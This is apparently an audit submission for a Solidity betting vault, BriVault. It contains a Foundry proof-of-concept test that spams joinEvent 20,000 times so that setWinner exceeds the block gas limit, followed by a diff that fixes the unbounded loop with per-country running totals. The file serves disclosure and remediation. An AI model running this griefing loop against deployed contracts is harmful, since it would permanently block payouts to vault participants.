pragma solidity ^0.8.24;
import {Test} from "forge-std/Test.sol";
import {BriVault} from "../src/briVault.sol";
import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import {MockERC20} from "./MockErc20.t.sol";
/// @notice PoC: anyone with a deposit can call `joinEvent` repeatedly. Each call
/// appends to `usersAddress`, which `setWinner` later iterates in full. Once enough
/// entries exist, `setWinner` needs more gas than a block provides, so the vault
/// can never be finalized.
contract WinnerSharesUnboundedLoopTest is Test {
    /// @dev Mainnet block gas limit used as the cap for the `setWinner` call.
    /// Foundry's default per-test gas limit is effectively unbounded, so without an
    /// explicit cap the loop would simply succeed and nothing would be shown.
    uint256 constant BLOCK_GAS_LIMIT = 30_000_000;
    /// @dev Redundant joins made by the griefer. Each adds one `usersAddress` entry
    /// (roughly 2.8k gas per entry in the winner loop). 20k leaves a wide margin above
    /// BLOCK_GAS_LIMIT; 10k lands too close to it to be conclusive.
    uint256 constant GRIEF_JOINS = 20_000;
    /// @dev Index of the only configured team.
    uint256 constant COUNTRY_ID = 10;

    BriVault vault;
    MockERC20 token;
    address owner = makeAddr("owner");
    address griefer = makeAddr("griefer");
    address fee = makeAddr("fee");
    uint256 start;
    uint256 end;
    string[48] countries;

    /// @dev Deploys the vault, registers one team and gives the griefer a deposit.
    /// Every prank opened here is closed here, so tests start from a clean caller.
    function setUp() public {
        start = block.timestamp + 2 days;
        end = start + 30 days;
        token = new MockERC20("Mock", "M");
        token.mint(griefer, 100 ether);

        vm.startPrank(owner);
        vault = new BriVault(
            IERC20(address(token)),
            150,
            start,
            fee,
            0.0002 ether,
            end
        );
        countries[COUNTRY_ID] = "Japan";
        vault.setCountry(countries);
        vm.stopPrank();

        vm.startPrank(griefer);
        token.approve(address(vault), type(uint256).max);
        vault.deposit(5 ether, griefer);
        vm.stopPrank();
    }

    /// @dev Calls `setWinner` as the owner with at most BLOCK_GAS_LIMIT gas and
    /// returns whether it succeeded. A low-level call is used so that an out-of-gas
    /// halt is observed directly as `ok == false`.
    function _setWinnerWithinBlockGas() internal returns (bool ok) {
        vm.prank(owner);
        (ok, ) = address(vault).call{gas: BLOCK_GAS_LIMIT}(
            abi.encodeCall(BriVault.setWinner, (COUNTRY_ID))
        );
    }

    /// @dev Baseline: with a single honest join, `setWinner` fits in a block. This
    /// shows the failure below is caused by the griefing loop, not by the setup.
    function test_setWinner_fitsInBlock_withoutGriefing() public {
        vm.prank(griefer);
        vault.joinEvent(COUNTRY_ID);

        vm.warp(end + 1);
        assertTrue(_setWinnerWithinBlockGas(), "baseline setWinner should fit in a block");
    }

    /// @dev After GRIEF_JOINS redundant joins, `setWinner` cannot finish within the
    /// block gas limit, so winner selection is permanently blocked.
    function test_DoS_setWinner_by_UnboundedLoop() public {
        vm.startPrank(griefer);
        for (uint256 i; i < GRIEF_JOINS; ++i) {
            vault.joinEvent(COUNTRY_ID);
        }
        vm.stopPrank();

        vm.warp(end + 1);
        assertFalse(_setWinnerWithinBlockGas(), "setWinner should exceed the block gas limit");
    }
}
@@
contract BriVault is ERC4626, Ownable {
@@
- address[] public usersAddress;
+ address[] public usersAddress; // each address is pushed at most once (see isListed)
+ mapping(address => bool) internal isListed; // address already present in usersAddress
+ mapping(address => bool) internal hasJoined; // address currently has an active country pick
+ mapping(address => uint256) internal joinedCountryId; // index of the active pick; meaningful only while hasJoined
+ mapping(uint256 => uint256) public countryShares; // running total of recorded shares per country
@@
function joinEvent(uint256 countryId) public {
if (stakedAsset[msg.sender] == 0) { revert noDeposit(); }
if (countryId >= teams.length) { revert invalidCountry(); }
if (block.timestamp > eventStartDate) { revert eventStarted(); }
userToCountry[msg.sender] = teams[countryId];
- uint256 participantShares = balanceOf(msg.sender);
- userSharesToCountry[msg.sender][countryId] = participantShares;
- usersAddress.push(msg.sender);
- numberOfParticipants++;
- totalParticipantShares += participantShares;
+ uint256 participantShares = balanceOf(msg.sender);
+ // A repeat call (same or different country) replaces the caller's previous
+ // pick instead of adding to it. Otherwise spamming joinEvent would inflate
+ // countryShares, and therefore totalWinnerShares, diluting every winner's payout.
+ _clearPick(msg.sender);
+ hasJoined[msg.sender] = true;
+ joinedCountryId[msg.sender] = countryId;
+ numberOfParticipants++;
+ userSharesToCountry[msg.sender][countryId] = participantShares;
+ countryShares[countryId] += participantShares;
+ totalParticipantShares += participantShares;
+ // Push each address at most once so usersAddress cannot be bloated.
+ if (!isListed[msg.sender]) {
+     isListed[msg.sender] = true;
+     usersAddress.push(msg.sender);
+ }
emit joinedEvent(msg.sender, countryId);
}
@@
function cancelParticipation () public {
if (block.timestamp >= eventStartDate){ revert eventStarted(); }
- uint256 refundAmount = stakedAsset[msg.sender];
- stakedAsset[msg.sender] = 0;
- uint256 shares = balanceOf(msg.sender);
- _burn(msg.sender, shares);
- IERC20(asset()).safeTransfer(msg.sender, refundAmount);
+ uint256 refundAmount = stakedAsset[msg.sender];
+ stakedAsset[msg.sender] = 0;
+ uint256 shares = balanceOf(msg.sender);
+ // Remove the caller's recorded pick from the running totals. This is O(1):
+ // the stored joinedCountryId means no scan over teams is needed.
+ _clearPick(msg.sender);
+ _burn(msg.sender, shares);
+ IERC20(asset()).safeTransfer(msg.sender, refundAmount);
}
@@
+/// @dev Removes `user`'s active pick, if any, from the per-country and global
+/// running totals, and marks the user as not joined. It is called before
+/// re-picking and on cancellation, so every recorded share is counted exactly once.
+/// Checked subtraction is intentional: an underflow would mean the accounting
+/// invariant is broken, and reverting is safer than silently clamping.
+/// NOTE(review): recorded shares are a snapshot taken at join time, as in the
+/// original code. Later deposits or share transfers are not reflected.
+function _clearPick(address user) internal {
+    if (!hasJoined[user]) return;
+    uint256 cid = joinedCountryId[user];
+    uint256 recorded = userSharesToCountry[user][cid];
+    countryShares[cid] -= recorded;
+    totalParticipantShares -= recorded;
+    userSharesToCountry[user][cid] = 0;
+    hasJoined[user] = false;
+    numberOfParticipants--;
+}
@@
-function _getWinnerShares () internal returns (uint256) {
- for (uint256 i = 0; i < usersAddress.length; ++i){
- address user = usersAddress[i];
- totalWinnerShares += userSharesToCountry[user][winnerCountryId];
- }
- return totalWinnerShares;
-}
+/// @dev Reads the pre-aggregated share total of the winning country and caches
+/// it in totalWinnerShares. The cost is O(1), independent of the number of
+/// participants, so setWinner can no longer be pushed past the block gas limit.
+function _getWinnerShares () internal returns (uint256) {
+    totalWinnerShares = countryShares[winnerCountryId];
+    return totalWinnerShares;
+}